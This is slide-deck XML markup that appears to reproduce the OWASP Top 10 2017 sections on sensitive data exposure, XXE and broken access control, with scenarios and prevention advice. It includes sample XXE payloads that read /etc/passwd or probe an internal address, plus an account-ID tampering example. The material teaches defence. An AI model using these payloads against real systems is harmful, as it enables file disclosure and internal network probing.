                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Disable caching for responses that contain sensitive data.</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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Verify independently the effectiveness of configuration and settings.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A3</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2017337676"/>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Exploitability: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Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike"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Technical: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ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s client, e.g. browser. A manual attack is generally required. Previously </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>retrieved password databases</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> could be brute forced </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>by Graphics Processing Units (GPUs).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weak password hashing storage techniques. For data in transit, server side weaknesses are mainly easy to detect, but hard for data at rest.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90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creden-tials, personal data, and credit cards, which often require protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</a:t>
                      </a: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Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The easiest way is to upload a malicious XML file, if accepted:</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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The attacker attempts to extract data from the server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:latin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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    &lt;foo&gt;&amp;xxe;&lt;/foo&gt;</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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private" &gt;]&gt;</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY xxe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p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The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ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If the application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Being vulnerable to XXE attacks likely means that the application is vulnerable to denial of service attacks including the Billion Laughs attack.</a:t>
            </a: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itchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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9"/>
              </a:rPr>
              <a:t>OWASP XXE Vulnerability</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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XXE Prevention</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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XML Security</a:t>
            </a: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ru-RU"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1"/>
              </a:rPr>
              <a:t>CWE-611: Improper Restriction of XXE</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2"/>
              </a:rPr>
              <a:t>Billion Laughs Attack</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3"/>
              </a:rPr>
              <a:t>SAML Security XML External Entity Attack</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4"/>
              </a:rPr>
              <a:t>Detecting and exploiting XXE in SAML Interfaces</a:t>
            </a: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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Whenever possible, use less complex data formats such as JSON, and avoiding serialization of sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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 Use dependency checkers. Update SOAP to SOAP 1.2 or higher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disable XML external entity and DTD processing in all XML parsers in the application, as per the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement positive ("whitelisting") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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Web Application Firewalls (WAFs) to detect, monitor, and block XXE attacks. </a:t>
            </a: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A4</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221113508"/>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Exploitability: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Prevalence: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Detectability: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Technical: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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> tools require additional manual steps to detect and exploit this issue. Manual testers need to be trained in how to test for XXE, as it not commonly tested as of 2017.</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ru-RU" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute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ru-RU" sz="90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ru-RU" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString(1, request.getParameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" b="1">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ru-RU" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>page, this is a flaw.</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r>
              <a:rPr lang="ru-RU" sz="90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Allowing the primary key to be changed to another users record, permitting viewing or editing someone else's account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">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Metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT)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Accessing API with missing access controls for POST, PUT and DELETE.</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ru-RU" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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4"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Access Controls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5"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V4 Access Control</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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Authorization Testing</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7"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Access Control</a:t>
            </a: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ru-RU"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8"/>
              </a:rPr>
              <a:t>CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</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9"/>
              </a:rPr>
              <a:t>CWE-284: Improper Access Control (Authorization)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0"/>
              </a:rPr>
              <a:t>CWE-285: Improper Authorization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1"/>
              </a:rPr>
              <a:t>CWE-639: Authorization Bypass Through User-Controlled Key</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2"/>
              </a:rPr>
              <a:t>PortSwigger: Exploiting CORS Misconfiguration</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ru-RU" sz="90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minimizing CORS usage.</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ru-RU" sz="90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A5</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2969773518"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="223032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Exploitability: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Prevalence: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Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" i="0" u="none" strike="noStrike" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
